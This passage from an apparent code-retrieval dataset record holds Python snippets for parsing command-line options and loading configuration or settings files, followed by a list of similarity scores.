self._parser.add_argument(\n \"--skip-delete\",\n help=\"Delete the scraper folder in /tmp after run\",\n action=\"store_true\",\n )", "def read_userconfig(self, userconfig):\n if hasattr(self, \"userconfig\"):\n raise ConfigError('User configuration already loaded from \"%s\"' %\n self.userconfig)\n #\n try:\n config = open(userconfig).read().split(\"\\n\")\n except IOError:\n raise ConfigError('Cannot read config from \"%s\"' % userconfig)\n #\n self.read_config(config)\n self.userconfig = os.path.abspath(userconfig)\n logger.info(\"Loaded user config: {0}\".format(self.userconfig))", "def parse_args():\n parser = argparse.ArgumentParser(\n description='Convert environment variables in to a configuration file')\n parser.add_argument('-p',\n '--prefix',\n help='Prefix of env vars to parse',\n required=True)\n parser.add_argument('-f',\n '--format',\n help='Output file format',\n default='ini',\n choices=['ini', 'json'])\n parser.add_argument('-o',\n '--output-file',\n help='Outfile file path',\n default='/dev/stdout')\n parser.add_argument(\n '-r',\n '--reference-file',\n type=argparse.FileType('r'),\n help='Load this reference file for existing/hard coded values')\n\n return parser.parse_args()", "def 
parse_command_line(self, argv):\n from optparse import OptionParser\n usage = \"usage: %prog [options]\"\n parser = OptionParser(usage)\n\n (options, args) = parser.parse_args(argv)", "def test_settings(self):\n\n wf._items = []\n\n sys.argv = ['drive.py', '>']\n main(None)\n self.assertEqual(len(wf._items), 4)\n self.assertEqual(wf._items[0].title, SETTINGS['LOGIN']['title'])\n self.assertEqual(wf._items[1].title, SETTINGS['LOGOUT']['title'])\n self.assertEqual(wf._items[2].title, SETTINGS['CLEAR_CACHE']['title'])\n self.assertEqual(wf._items[3].title, SETTINGS['SET_CACHE']['title'] % '[seconds]')\n wf._items = []", "def args(self, value):\n # obtener la linea de comandos convertida a dict, eliminando algunos\n self._args = self.clean_command_line(value)\n\n # obtener el archivo de configuracion\n config = self.get_config()\n\n # Cliente actual, de los parametros, este siempre tiene precedencia\n client = self._args.get('client')\n\n # Fallback lo saco de la configuracion, y si tampoco esta es un error\n if not client:\n client = config.get('client')\n self._args['client'] = client\n\n # si aca no tengo definido el cliente termino con error\n if not client:\n msg.err('Need -c option (client name). Process aborted')\n\n # obtener la configuracion para el cliente actual.\n client_config = config.get(client, {})\n\n # Mezclo argumentos de linea de comandos con configuracion\n # la linea de comandos tiene precedencia\n for item in client_config or []:\n if item not in self._args:\n self._args[item] = client_config.get(item)\n\n # agregar valores por defecto si no estan definidos\n self.add_default_values()\n\n # si aca no tengo definido la aplicacion default termino con error\n if not self._args.get('defapp'):\n msg.err('Need --defapp option (default application). 
'\n 'Process aborted')\n\n self.save_config()", "def read_settings():\n \n settings = OrdDic()\n settings.update(json.load(open(\"resources/files/settings.txt\", \"r\")))\n\n ## OLD WAY BELOW\n\n #r = open(\"resources/files/settings.txt\", \"r\", newline=\"\\n\")\n # for option in r.read().split('\\n'):\n # try:\n # #option = option.split('\\\\')\n # #settings.update({option[0]: option[1]})\n # # settings.update(json.loads(option))\n # except IndexError:\n # pass\n return settings", "def parseCommandLine_(self):\n\n self.ensureNotCreated()\n\n import sys\n\n parseCommandLine = False\n for argv in sys.argv:\n if 'globalTag' in argv or 'era' in argv or 'process' in argv:\n parseCommandLine = True\n break\n\n if parseCommandLine:\n from FWCore.ParameterSet.VarParsing import VarParsing\n options = VarParsing()\n options.register('globalTag',\n '',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n 'The globaltag to use')\n\n options.register('era',\n '',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n 'Era of the dataset')\n\n options.register('process',\n '',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n 'Process name of the MiniAOD production.')\n\n options.parseArguments()\n\n if options.globalTag:\n self.globalTag = options.globalTag\n\n if options.era:\n assert options.era == '25ns' or options.era == '50ns'\n if options.era == '25ns':\n self.era = eras.Run2_25ns\n else:\n self.era = eras.Run2_50ns\n\n if options.process:\n self.processName = options.process", "def read_settings():\n settings_path = join(dirname(dirname(__file__)), '.settings')\n filename = settings_path\n settings = configparser.ConfigParser()\n settings.read(filename)\n return settings", "def main():\n args = parse_args()\n process_args(args)", "def get_configuration(args):\n\n #------------------------------------------------------------------------\n # If configfile is not specified, dump a configfile on screen\n default_config, required_config = get_default_configuration()\n if args.configfile is None:\n write_configuration(parser.prog, version, default_config, required_config)\n raise SystemExit\n\n #------------------------------------------------------------------------\n # If you are here, then a configfile was given. 
Try to parse it\n userconf = ConfigParser.SafeConfigParser()\n userconf.read(args.configfile)\n runconf = {}\n\n if userconf.has_option('Config', 'verbose'): \n runconf['verbose'] = userconf.getboolean('Config', 'verbose')\n else:\n runconf['verbose'] = default_config['verbose']\n\n if runconf['verbose']: print \"Configuration for this run: \"\n for key in required_config.keys():\n try:\n runconf[key] = userconf.getfloat('Config', key)\n if runconf['verbose']: print \" > {key} = {val}\".format(key=key, val=runconf[key])\n except ConfigParser.NoOptionError:\n if runconf['verbose']: print \"\\nError: Required parameter {key} missing from config file!!\".format(key=key)\n if runconf['verbose']: print \"Update the file {configfile} and try again\\n\".format(configfile=args.configfile)\n raise SystemExit\n except ValueError:\n runconf[key] = userconf.get('Config', key)\n if runconf['verbose']: print \" > {key} = {val}\".format(key=key, val=runconf[key])\n\n for key in default_config.keys():\n if key == 'verbose': continue\n try:\n runconf[key] = userconf.getfloat('Config', key)\n except ConfigParser.NoOptionError:\n runconf[key] = default_config[key]\n if runconf['verbose']: print \"Using default value for {key}\".format(key=key)\n except ValueError:\n runconf[key] = userconf.get('Config', key)\n if runconf['verbose']: print \" > {key} = {val}\".format(key=key, val=runconf[key])\n\n # Now convert the bool values: verbose is already processed\n boolkeys = ['auto', 'do_fit']\n for b_key in boolkeys:\n #print b_key, runconf[b_key]\n test_string = \"{b_key}\".format(b_key = runconf[b_key])\n #print test_string\n if (test_string[0].upper() == 'T') or (test_string[0] == '1'):\n runconf[b_key] = True\n else:\n runconf[b_key] = False\n #print b_key, runconf[b_key]\n\n # Configuaration finally parsed!\n # At some future time, I should validate it...\n return runconf", "def __init__(self):\n try:\n with open(os.path.expanduser(\"~/.dkeyrc\"), 'r') as f:\n self.__cfgdata = json.load(f)\n except Exception as e:\n print(\"Error: Unable to load config JSON at ~/.dkeyrc -- %s\" % (e))\n sys.exit(1)", "def read_config(self):\n cfg = read_conf(self.CONF_FILE)\n self.channel = cfg['channel']\n self.seuil_min = cfg['seuil_min']\n self.last_level = cfg['last_level']\n self.last_level_date = cfg['last_level_date']", "def readArgs():\n parser = argparse.ArgumentParser(description=\n \"\"\"Debug script. This program is used in order to generate a summary\n statistics for the csv files generated by the annotation_parser. 
Things\n like the average amount of overlap of each window and the average deviation.\n \"\"\")\n\n parser.add_argument('-f', '--csv-dir', metavar='',\n dest='csv_dir',\n action='store', default=os.path.dirname(os.path.abspath(__file__)),\n help='Specify the csv directory.')\n parser.add_argument('-d', '--deviation', metavar='',\n dest='deviation', action='store',\n default=50,\n help='percentage set point from which evaluate the deviation from.')\n\n return parser.parse_args()", "def main():\n \n try:\n opts, args = getopt.getopt(sys.argv[1:], '', ['user=', 'pw='])\n except getopt.error, msg:\n print 'python syncContacts.py --user [username] --pw [password]'\n sys.exit(2)\n\n user = ''\n pw = ''\n # Process options\n for option, arg in opts:\n if option == '--user':\n user = arg\n elif option == '--pw':\n pw = arg\n\n run(user,pw)", "def process_commandline():\n parser = OptionParser(__doc__.strip())\n support_path = '/Library/' if os.getuid() == 0 else os.path.expanduser('~/Library/')\n preference_file = os.path.join(support_path, 'Preferences', 'com.googlecode.pymacadmin.crankd.plist')\n module_path = os.path.join(support_path, 'Application Support/crankd')\n\n if os.path.exists(module_path):\n sys.path.append(module_path)\n else:\n print >> sys.stderr, \"Module directory %s does not exist: Python handlers will need to use absolute pathnames\" % module_path\n\n parser.add_option(\"-f\", \"--config\", dest=\"config_file\", help='Use an alternate config file instead of %default', default=preference_file)\n parser.add_option(\"-l\", \"--list-events\", action=\"callback\", callback=list_events, help=\"List the events which can be monitored\")\n parser.add_option(\"-d\", \"--debug\", action=\"count\", default=False, help=\"Log detailed progress information\")\n (options, args) = parser.parse_args()\n\n if len(args):\n parser.error(\"Unknown command-line arguments: %s\" % args)\n\n options.support_path = support_path\n options.config_file = os.path.realpath(options.config_file)\n\n # This is somewhat messy but we want to alter the command-line to use full\n # file paths in case someone's code changes the current directory or the\n sys.argv = [ os.path.realpath(sys.argv[0]), ]\n\n if options.debug:\n logging.getLogger().setLevel(logging.DEBUG)\n sys.argv.append(\"--debug\")\n\n if options.config_file:\n sys.argv.append(\"--config\")\n sys.argv.append(options.config_file)\n\n return options", "def parse_command_line():\n\n desc = \"Perform fluid dynamics simulations.\"\n parser = argparse.ArgumentParser(description=desc)\n\n # Parameter file\n help_txt = \"name of the configuration file (default is 'config.ini.')\"\n parser.add_argument(\"-f\", \"--file\", metavar=\"FILE\", default=\"config.ini\",\n required=False, dest=\"config_file\", help=help_txt)\n\n return parser.parse_args()", "def user_config():\n user_config = copy.deepcopy(config)\n user_config.pop(\"metadata\")\n user_config.pop(\"version\")\n user_config.pop(\"refers\")\n user_config.pop(\"pool_size\")\n return user_config", "def __init__(self):\n\n self.config = load_config()\n self.set_env_var()" ]
[ "0.7167355", "0.68207556", "0.64562625", "0.6258873", "0.6210641", "0.611424", "0.6007026", "0.59203523", "0.5906044", "0.5899174", "0.5890425", "0.5873461", "0.586222", "0.58594745", "0.58452356", "0.58350545", "0.5832136", "0.58280176", "0.5820044", "0.58118266", "0.57982767", "0.578663", "0.578479", "0.57750136", "0.5734979", "0.5726565", "0.5723044", "0.57195425", "0.57112813", "0.57050145", "0.56740767", "0.56306046", "0.5618366", "0.56147", "0.55839205", "0.5560629", "0.55526453", "0.55419", "0.5522561", "0.55204207", "0.5496396", "0.5490235", "0.54831296", "0.54788417", "0.54685503", "0.5452977", "0.54481554", "0.5441359", "0.5433679", "0.5431753", "0.5423277", "0.54130244", "0.54118377", "0.5400214", "0.5393679", "0.5388049", "0.5380073", "0.53769815", "0.53699094", "0.5369281", "0.5357346", "0.53547853", "0.5354158", "0.53527683", "0.53415406", "0.5341248", "0.53404725", "0.5337396", "0.53269374", "0.53225845", "0.53207415", "0.5315764", "0.5310434", "0.5305158", "0.52955234", "0.5294928", "0.5284141", "0.52807426", "0.52797616", "0.5276462", "0.5274188", "0.52663356", "0.52652806", "0.52607816", "0.52569485", "0.52554345", "0.52552813", "0.5247078", "0.5244006", "0.52414656", "0.5240181", "0.5239197", "0.5229953", "0.5229196", "0.52273524", "0.52251697", "0.52225757", "0.52220404", "0.52218586", "0.5218774", "0.5216414" ]
0.0
-1
I send an echo packet with the TTL set to 0, so when it arrives at the GW it sends me back a TTL ERROR (an ICMP message); the dst of that reply is our IP.
import re
from uuid import getnode
from scapy.all import IP, ICMP, sr1

def find_my_IP_and_MAC():
    mac = ':'.join(re.findall('..', '%012x' % getnode()))
    # I write IP and not a domain because I want to save time.
    p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=0, timeout=5)  # verbose=0 -> without output
    return mac, p.dst
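A minimal usage sketch (not part of the original snippet), assuming scapy is installed and the script runs with root privileges so the raw ICMP probe can actually be sent:

if __name__ == "__main__":
    # Hypothetical driver: print the MAC and IP discovered for this host.
    my_mac, my_ip = find_my_IP_and_MAC()
    print("MAC: %s  IP: %s" % (my_mac, my_ip))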
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pinger(dst):\n icmpId = 0x4711\n for i in range(MAX_NUM_PROBES):\n # Erzeuge das ICMP Echo Anfrage-Paket (type=8).\n # Der Parameter seq ist ein Zaehler fuer die Anfrage-Pakete.\n icmpPkt = ICMP() # Hier muss ergaenzt werden!\n \"\"\"\n scapy liefert die Klasse ICMP mit der ein ICMP-Paket erzeugt werden kann.\n Es hat die folgenden Felder:\n >>> i = ICMP()\n >>> i.default_fields\n {'addr_mask': '0.0.0.0',\n 'chksum': None,\n 'code': 0,\t\t\t# \n 'gw': '0.0.0.0',\n 'id': 0,\n 'length': 0,\n 'nexthopmtu': 0,\n 'ptr': 0,\n 'reserved': 0,\n 'seq': 0,\n 'ts_ori': 70195301,\n 'ts_rx': 70195301,\n 'ts_tx': 70195301,\n 'type': 8, # echo request\n 'unused': 0}\n\n Ueberlegen Sie, welche Felder Sie beim Erzeugen der ICMP-Instanz mit welchen\n Werten versehen muessen. Die Parameteruebergabe funktioniert mit\n Parametername=Parameterwert, also z.B.:\n ICMP(type=5, code=3, ...)\n \"\"\"\n\n # Nun wird das Anfragepaket erzeugt. Die unterste Schicht, die wir hier angeben muessen \n # ist IP (die Vermittlungsschicht). Um alle Schichten darunter kuemmert sich scapy bzw.\n # das Betriebssystem. \n # Dem IP-Paket geben wir als Ziel-IP-Adresse den Wert der Variable dst an. Scapy kuemmert\n # sich automatisch darum, eine passende Quell-IP-Adresse zu verwenden.\n # Die Schichtung von Paketen erfolgt mit Hilfe des Schraegstrich-Operators '/'.\n ipPkt = IP(dst=dst)\n req = ipPkt/icmpPkt\n\n # Gib eine Zusammenfassung des fertigen Pakets aus\n req.show2()\n\n # Die einfachste Art der Implementierung nutzt die Funktion sr() von scapy.\n # Der Name sr() steht dabei fuer `send` und `receive`, also `sende` und `empfange`.\n # Informationen zu sr() finden Sie hier: \n # https://scapy.readthedocs.io/en/latest/usage.html#send-and-receive-packets-sr\n # Warte maximal 5 Sekunden auf eine Antwort (timeout=5).\n ans, unans = sr(req, timeout=5, verbose=0)\n # Gib eine einzeilige Zusammenfassung von Anfrage und Antwort aus\n ans.summary()\n # Warte 0.9 Sekunden bis zur naechsten Iteration\n time.sleep(0.9)", "def atraso(myStats, destIP, hostname, timeout, mySeqNumber, packet_size, quiet=False):\n delay = None\n \n \"\"\"\n socket.AF_INET, é uma string que representa um nome de host na notação de domínio da Internet \n como 'daring.cwi.nl' ou um endereço IPv4 como '100.50.200.5' e porta é um inteiro.\"\"\"\n \"\"\"\n socket.getprotobyname(protocolname), Traduz um nome de protocolo da Internet (por exemplo, 'icmp') \n para uma constante adequada para passar como o terceiro argumento (opcional) \n para a função socket (). Isso geralmente é necessário apenas para soquetes abertos \n no modo \"bruto\" (SOCK_RAW); para os modos normais de soquete, o protocolo correto é \n escolhido automaticamente se o protocolo for omitido ou zero.\n \"\"\"\n\n try: \n mySocket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname(\"icmp\"))\n except socket.error as e:\n print(\"Falhou!!!. 
(Erro de socket: '%s')\" % e.args[1])\n\n my_ID = os.getpid() & 0xFFFF # retorna a identificação do processo atual.\n\n sentTime = send_one_ping(mySocket, destIP, my_ID, mySeqNumber, packet_size) # retorna o tempo enviado\n if sentTime == None:\n mySocket.close()\n return delay\n\n myStats.pktsSent += 1 # contador de pacotes enviados\n\n # retorna o tempo de resposta, o tamanho dado, o ping pingado, o numero de seq, id e timeout \n recvTime, dataSize, iphSrcIP, icmpSeqNumber, iphTTL = receive_one_ping(\n mySocket, my_ID, timeout) \n mySocket.close()\n\n if recvTime: # tempo de resposta for verdadeiro\n delay = (recvTime-sentTime)*1000 # tempo de resposta - tempo de envio = delay(ms)\n if not quiet:\n # exibição das respostas do ping\n responseServer = {'bytes': dataSize, 'ip': socket.inet_ntoa(struct.pack(\"!I\", iphSrcIP)), 'sequencia': icmpSeqNumber, 'ttl': iphTTL, 'tempo': round(delay,2)}\n listResponse.append(responseServer)\n\n\n myStats.pktsRcvd += 1 # contador de pacotes recebidos\n myStats.totTime += delay # contador do tempo total (todos os times desse host) \n if myStats.minTime > delay:\n myStats.minTime = delay # contador tempo mínimo\n if myStats.maxTime < delay: \n myStats.maxTime = delay # contador tempo máximo\n else:\n delay = None\n print(\"Requesição excedeu o tempo limite.\")\n\n return delay", "def send_one_ping(mySocket, destIP, myID, mySeqNumber, packet_size):\n \n myChecksum = 0 # contador da soma de verificação\n\n # Faça um cabeçalho fictício com uma soma de verificação 0\n # Retorne uma string contendo os valores compactados de acordo com o formato especificado. \n header = struct.pack(\n \"!BBHHH\", ICMP_ECHO, 0, myChecksum, myID, mySeqNumber\n )\n\n padBytes = []\n startVal = 0x42\n \n for i in range(startVal, startVal + (packet_size-8)):\n padBytes += [(i & 0xff)] # Mantenha os caracteres no intervalo de 0 a 255\n data = bytearray(padBytes)\n\n # Calculo a soma de verificação nos dados e no cabeçalho fictício.\n myChecksum = checksum(header + data) # A soma de verificação está em ordem de rede\n\n # Agora que temos a soma de verificação correta, colocamos isso. \n # É apenas mais fácil, para criar um novo cabeçalho do que colocá-lo no modelo.\n header = struct.pack(\n \"!BBHHH\", ICMP_ECHO, 0, myChecksum, myID, mySeqNumber\n )\n\n # pacotes com a integridade dos dados verificada e com cabeçalho checksum adicionado.\n packet = header + data\n\n sendTime = default_timer() # Essa função retorna o tempo de espera junto com o tempo da CPU e depende da plataforma. 
\n\n try:\n \"\"\" \n socket.sendto(bytes, address)\n Retornar o número de bytes enviados.\n \"\"\"\n mySocket.sendto(packet, (destIP, 1))\n except socket.error as e:\n print(\"Falha Geral (%s)\" % (e.args[1]))\n return\n\n return sendTime", "def scapy_create_send_ICMP(self, ipdst):\n ip_header = self.define_ip_header(dst=ipdst)\n icmp_header = self.define_icmp_header()\n send(ip_header/icmp_header, count = DEFAULT_PACKET_DURATION)", "def reply_icmp(self, datapath, srcMac, dstMac, srcIp, dstIp, ttl, type, id,\n seq, data, inPort):\n\n router_port = self.get_router_port_by_gateway_ip(datapath.id, dstIp)\n if router_port:\n # dstIp is the IP of one of the router ports\n # -> replay\n # data already available\n send_src_mac = dstMac\n send_dst_mac = srcMac\n send_src_ip = dstIp\n send_dst_ip = srcIp\n send_port = inPort\n self.send_icmp(datapath, send_src_mac, send_src_ip, send_dst_mac,\n send_dst_ip, send_port, seq, data, id, 0, ttl)\n LOG.debug(\"send icmp echo reply %s => %s (port%d)\"\n % (send_src_mac, send_dst_mac, send_port))\n\n else:\n # if in own net.\n matching_port = self.get_port_by_ip(datapath, dstIp)\n if matching_port:\n # send ARP request opcode =1\n # A flow rule is created when receiving the arp reply from client\n # self.send_arp(datapath, 1, matching_port.mac, str(matching_port.gateway_ip), \"00:00:00:00:00:00\", dstIp,\n # int(matching_port.port_no))\n pass\n else:\n print (\"Forward ICMP to matching network\")\n out_port, new_src_mac, new_dst_mac = self.get_next_hop(dpid=datapath.id, dstIP=dstIp)\n if out_port and new_dst_mac and new_dst_mac:\n self.add_flow_gateway_for_ip(datapath, int(out_port), dstIp, new_src_mac, new_dst_mac)\n # self.add_flow_gateway(datapath,ether.ETH_TYPE_IP, new_src_mac,new_dst_mac,int(out_port),dstIp)\n\n return 0", "def do_one(dest_addr, timeout):\n icmp = socket.getprotobyname(\"icmp\")\n try:\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)\n except socket.error, (errno, msg):\n if errno == 1:\n # Operation not permitted\n msg = msg + (\n \" - Note that ICMP messages can only be sent from processes\"\n \" running as root.\"\n )\n raise socket.error(msg)\n raise # raise the original error\n \n my_ID = os.getpid() & 0xFFFF\n \n send_one_ping(my_socket, dest_addr, my_ID)\n delay = receive_one_ping(my_socket, my_ID, timeout)\n \n my_socket.close()\n return delay", "def do_one(dest_addr, timeout, icmp = 1):\n try:\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)\n except socket.error as e:\n if e.errno == 1:\n # Operation not permitted\n e.msg = e.msg + (\n \" - Note that ICMP messages can only be sent from processes\"\n \" running as root.\"\n )\n raise socket.error(e.msg)\n raise # raise the original error\n\n my_id = os.getpid() & 0xFFFF\n\n send_one_ping(my_socket, dest_addr, my_id)\n delay = receive_one_ping(my_socket, my_id, timeout)\n\n my_socket.close()\n return delay", "def _icmp_send(dp, port_out, ip_src=DISCOVERY_IP_SRC, ip_dst=DISCOVERY_IP_DST,\n eth_src='02:b0:00:00:00:b5', eth_dst='02:bb:bb:bb:bb:bb',\n icmp_type=8, icmp_code=0):\n\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n pkt = packet.Packet()\n pkt.add_protocol(ethernet.ethernet(ethertype=0x0800,\n dst=eth_dst,\n src=eth_src))\n\n pkt.add_protocol(ipv4.ipv4(dst=ip_dst,\n src=ip_src,\n proto=1))\n\n ##Latency measurement\n my_clock = str(time.clock())\n\n ##TODO: Rework payload and codes to properly work with Fragmentation needed\n pkt.add_protocol(icmp.icmp(type_=icmp_type,\n code=icmp_code,\n csum=0,\n data=icmp.echo(1,1,\"{'dpid' : 
\"+str(dp.id)+\",'port_out' : \"+str(port_out)+\",'clock' : \"+my_clock+\"}\")))\n pkt.serialize()\n data=pkt.data\n actions=[parser.OFPActionOutput(port_out,0)]\n out=parser.OFPPacketOut(datapath=dp, buffer_id=ofp.OFP_NO_BUFFER, in_port=ofp.OFPP_CONTROLLER, actions=actions, data=data)\n ##LOG.debug('***ICMP DEBUG*** Sending ICMP with Payload: ' + \"{'dpid' : \"+str(dp.id)+\",'port_out' : \"+str(port_out)+\",'clock' : \"+my_clock+\"}\" )\n dp.send_msg(out)", "def send_error(self, conn, msg):\n # dst ip becomes src ip to return the message\n\n # src ip becomes this ip\n\n # type becomes \"no route\"\n\n # msg is empty\n\n # send from port incoming...current dst ip?\n\n # TODO\n\n return", "def send_ttl_expire(s, in_eth, in_ip, payload):\n saddr = ttl2ip(in_ip.ttl, in_ip.daddr)\n\n eth = ethhdr(in_eth.h_source, in_eth.h_dest, in_eth.h_proto)\n ip = iphdr(\n version=4,\n ihl=5,\n id=in_ip.id,\n ttl=64,\n protocol=1,\n saddr=saddr,\n daddr=in_ip.saddr,\n )\n icmp = icmphdr(11, 0, 0, 0, 0)\n\n ip.tot_len = len(ip) + len(icmp) + len(payload)\n ip.check = checksum(bytearray(ip))\n icmp.checksum = checksum(bytearray(icmp) + payload)\n\n msg = create_string_buffer(len(eth) + len(ip) + len(icmp) + len(payload))\n msg = bytearray(eth) + bytearray(ip) + bytearray(icmp) + payload\n\n print(\n \" %16s <- %16s ttl:%03d proto:%-3d icmp type:%-3d code:%-3d\"\n % (ip.daddr, ip.saddr, ip.ttl, ip.protocol, icmp.type, icmp.code)\n )\n s.send(msg)", "def shortest_forwarding(self, msg, eth_type, ip_src, ip_dst):\r\n\r\n pkt = packet.Packet(msg.data)\r\n icmp_pkt = pkt.get_protocol(icmp.icmp)\r\n if icmp_pkt:\r\n ip_protocol = 1\r\n print 'icmp processing!'\r\n self.icmp_forwarding(msg, ip_protocol, eth_type, ip_src, ip_dst)\r\n return\r\n datapath = msg.datapath\r\n in_port = msg.match['in_port']\r\n tcp_pkt = None\r\n udp_pkt = None\r\n dst_port = self.awareness.get_host_location(ip_dst)[1]\r\n tcp_pkt = pkt.get_protocol(tcp.tcp)\r\n udp_pkt = pkt.get_protocol(udp.udp)\r\n L4_port = None\r\n flow_info = None\r\n flow_info_reverse = None\r\n\r\n # if not icmp packet,Get ip_proto and L4 port number.\r\n result = self.get_sw(datapath.id, in_port, ip_src, ip_dst) # result = (src_sw, dst_sw)\r\n if (result):\r\n src_sw, dst_sw = result[0], result[1]\r\n if setting.enable_Flow_Entry_L4Port:\r\n ip_proto, L4_port, Flag = self.get_L4_info(tcp_pkt, udp_pkt)\r\n if result:\r\n if dst_sw:\r\n src_sw, dst_sw = result[0], result[1]\r\n if ip_proto and L4_port and Flag:\r\n if ip_proto == 6:\r\n L4_Proto = 'TCP'\r\n elif ip_proto == 17:\r\n L4_Proto = 'UDP'\r\n else:\r\n pass\r\n L4_port.reverse()\r\n flow_info = (eth_type, ip_src, ip_dst, in_port, ip_proto, Flag, L4_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port, ip_proto, Flag, L4_port)\r\n else:\r\n flow_info = (eth_type, ip_src, ip_dst, in_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port)\r\n else:\r\n flow_info = (eth_type, ip_src, ip_dst, in_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port)\r\n info = (ip_src, ip_dst, ip_proto, L4_port[0], L4_port[1])\r\n info2 = (ip_dst, ip_src, ip_proto, L4_port[1], L4_port[0])\r\n if (info in self.register) and (info2 in self.register):\r\n return\r\n self.register.append(info)\r\n self.register.append(info2)\r\n # dst_host and src_host link one same switch\r\n if self.newComingFlows['src'].has_key(ip_src):\r\n self.newComingFlows['src'][ip_src] += 1\r\n else:\r\n self.newComingFlows['src'][ip_src] = 1\r\n if self.newComingFlows['dst'].has_key(ip_dst):\r\n 
self.newComingFlows['dst'][ip_dst] += 1\r\n else:\r\n self.newComingFlows['dst'][ip_dst] = 1\r\n flowDemand = self._bandwidth_demand(ip_src, ip_dst)\r\n if src_sw == dst_sw:\r\n self.send_packet_out(datapath, msg.buffer_id, in_port, dst_port, msg.data)\r\n else:\r\n if not (str(src_sw).startswith('3') and str(dst_sw).startswith('3')):\r\n return\r\n paths = self.awareness.shortest_paths.get(src_sw).get(dst_sw)\r\n self.graph = self.monitor.graph\r\n path = self._select_paths1(flowDemand, paths)\r\n\r\n # path = self.get_path(src_sw, dst_sw, weight=self.weight)\r\n # Path has already been calculated, just get it.\r\n if path == None:\r\n return\r\n path.reverse()\r\n try:\r\n # bucket=self.swToSegments(path)\r\n # self.Segment_forwarding(flow_info,bucket)\r\n self.install_flow(self.datapaths, self.awareness.link_to_port, path, flow_info_reverse, msg.buffer_id,\r\n ip_dst, ip_src, msg.data)\r\n path.reverse()\r\n if len(flow_info_reverse) == 7:\r\n L4_port.reverse()\r\n self.install_flow(self.datapaths, self.awareness.link_to_port, path, flow_info, msg.buffer_id, ip_src,\r\n ip_dst, msg.data)\r\n # self.compute_runing_time()\r\n\r\n except:\r\n self.flood(msg)", "def receive_one_ping(self, current_socket):\n import select\n from struct import pack, unpack\n\n class HeaderInformation(dict):\n \"\"\" Simple storage received IP and ICMP header informations \"\"\"\n def __init__(self, names, struct_format, data):\n unpacked_data = unpack(struct_format, data)\n dict.__init__(self, dict(zip(names, unpacked_data)))\n\n ICMP_MAX_RECV = 2048 # Max size of incoming buffer\n timeout = self.timeout / 1000.0\n\n while True: # Loop while waiting for packet or timeou+t\n select_start = self.timer()\n inputready, outputready, exceptready = select.select([current_socket], [], [], timeout)\n select_duration = (self.timer() - select_start)\n if inputready == []: # timeout\n return None, 0, 0, 0, 0\n\n receive_time = self.timer()\n\n packet_data, address = current_socket.recvfrom(ICMP_MAX_RECV)\n\n icmp_header = HeaderInformation(\n names=[\n \"type\", \"code\", \"checksum\",\n \"packet_id\", \"seq_number\"\n ],\n struct_format=\"!BBHHH\",\n data=packet_data[20:28]\n )\n\n if icmp_header[\"packet_id\"] == self.own_id: # Our packet\n ip_header = HeaderInformation(\n names=[\n \"version\", \"type\", \"length\",\n \"id\", \"flags\", \"ttl\", \"protocol\",\n \"checksum\", \"src_ip\", \"dest_ip\"\n ],\n struct_format=\"!BBHHHBBHII\",\n data=packet_data[:20]\n )\n packet_size = len(packet_data) - 28\n ip = socket.inet_ntoa(pack(\"!I\", ip_header[\"src_ip\"]))\n # XXX: Why not ip = address[0] ???\n return receive_time, packet_size, ip, ip_header, icmp_header\n\n timeout = timeout - select_duration\n if timeout <= 0:\n return None, 0, 0, 0, 0", "def _arp_send(dp, port_out, arp_code, ip_sender, ip_target, eth_dst='ff:ff:ff:ff:ff:ff',eth_src=None,eth_target='00:00:00:00:00:00'):\n\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n pkt = packet.Packet()\n\n # HACK: to reply as real interface on virtual machine\n if dp.id in LAN_TYPE_FORWARDERS and dp.id == 0xa:\n eth_src = \"08:00:27:e1:e4:83\"\n elif dp.id in LAN_TYPE_FORWARDERS and dp.id == 0xc:\n eth_src = \"08:00:27:52:fb:7d\"\n\n ##If no src_mac was provided we generate one from Datapath ID of forwarder that recieved message\n ##If Datapath ID starts with zeros we cannot use it as legit MAC address\n ##Second hex digit must be 2 to indicate localy administered non-multicast address\n if eth_src == None:\n str_hex_dpid = str(hex(dp.id)).rstrip('L').lstrip('0x')\n if 
len(str_hex_dpid) < 11:\n eth_src ='02'\n for i in range(10-len(str_hex_dpid)):\n eth_src += '0'\n eth_src += str_hex_dpid\n else:\n eth_src = dp.id\n\n eth = ethernet.ethernet(eth_dst, eth_src, ether.ETH_TYPE_ARP)\n arp_req = arp.arp_ip(arp_code, eth_src, ip_sender, eth_target, ip_target)\n\n pkt = packet.Packet()\n pkt.add_protocol(eth)\n pkt.add_protocol(arp_req)\n pkt.serialize()\n actions=[parser.OFPActionOutput(port_out)]\n out=parser.OFPPacketOut(datapath=dp, buffer_id=ofp.OFP_NO_BUFFER, in_port=ofp.OFPP_CONTROLLER, actions=actions, data=pkt.data)\n dp.send_msg(out)", "def send_echo_reply(s, in_eth, in_ip, payload):\n eth = ethhdr(in_eth.h_source, in_eth.h_dest, in_eth.h_proto)\n ip = iphdr(\n version=4,\n ihl=in_ip.ihl,\n id=in_ip.id,\n ttl=64,\n protocol=1,\n saddr=in_ip.daddr,\n daddr=in_ip.saddr,\n )\n ipopts = payload[0 : ip.ihl * 4 - len(ip)]\n icmp = icmphdr.from_buffer_copy(payload[len(ipopts) :])\n\n icmp.type = 0\n icmp.code = 0\n icmp.checksum = 0\n\n payload = payload[len(ipopts) + len(icmp) :]\n ip.tot_len = len(ip) + len(ipopts) + len(icmp) + len(payload)\n ip.check = checksum(bytearray(ip) + bytearray(ipopts))\n icmp.checksum = checksum(bytearray(icmp) + payload)\n\n msg = create_string_buffer(\n len(eth) + len(ip) + len(ipopts) + len(icmp) + len(payload)\n )\n msg = bytearray(eth) + bytearray(ip) + bytearray(ipopts) + bytearray(icmp) + payload\n\n print(\n \" %16s <- %16s ttl:%03d proto:%-3d icmp type:%-3d code:%-3d\"\n % (ip.daddr, 